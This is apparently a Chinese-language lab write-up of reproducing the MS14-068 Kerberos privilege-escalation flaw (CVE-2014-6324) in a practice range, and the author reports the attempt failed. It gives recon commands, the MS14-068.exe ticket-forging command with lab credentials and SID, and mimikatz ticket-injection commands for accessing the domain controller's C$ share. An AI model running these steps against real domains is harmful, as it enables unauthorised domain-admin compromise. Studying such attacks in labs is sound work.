CVE-2014-6324(MS14-068)域内权限提升漏洞复现(失败)

漏洞原理

在kerberos协议中，Client去访问Server，需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC（特权属性证书），也就是Client的权限，包括Client的User的SID、Group的SID。ms14-068 漏洞就是 经过身份验证的Client在TGT中伪造高权限的PAC。该漏洞允许任何一个域普通用户，将自己提升至域管理员权限。

环境搭建

该漏洞复现环境是红日二靶场搭建的，拓扑如下

漏洞复现

该漏洞需要使用到以下信息：

• 域用户名（mssql）
• 域用户密码（1qaz@WSX）
• 域名（de1ay.com）
• 域用户SID（S-1-5-21-2756371121-2868759905-3853650604-2103）
• 域控地址（10.10.10.10）

信息收集

查看域名
ipconfig /all

image-20220902144537296

查看域用户SID
whoami /all

image-20220903205518435

查看域控ip
net time /domain		#查看域控名字
ping DC.de1ay.com		#ping域控就能得到域控ip地址

image-20220902144910203

首先查看有无ipc连接，发现没有ipc连接

dir \\10.10.10.10\c$

image-20220903205845769

在内网机器中运行运行以下命令生成TGT票据，需要MS14-068的EXP，在github上就能很容易找到。

MS14-068.exe -u mssql@de1ay.com -s S-1-5-21-2756371121-2868759905-3853650604-2103 -d 10.10.10.10 -p 1qaz@WSX

image-20220903205808836

将生成的TGT票据移动到mimikatz中进行票据的导入，进行票据攻击

mimikatz.exe
kerberos::purge
kerberos::ptc TGT_mssql@de1ay.com.ccache

image-20220903210021684

既然票据传递攻击成功了，那么我们就可以对域控的c盘映射到本地中，进行任意的查看，我这里为了方便就直接查看c盘。

这里我用mssql权限的时候，一直攻击失败，不知道是什么原因

dir \\10.10.10.10\c$

image-20220903230921178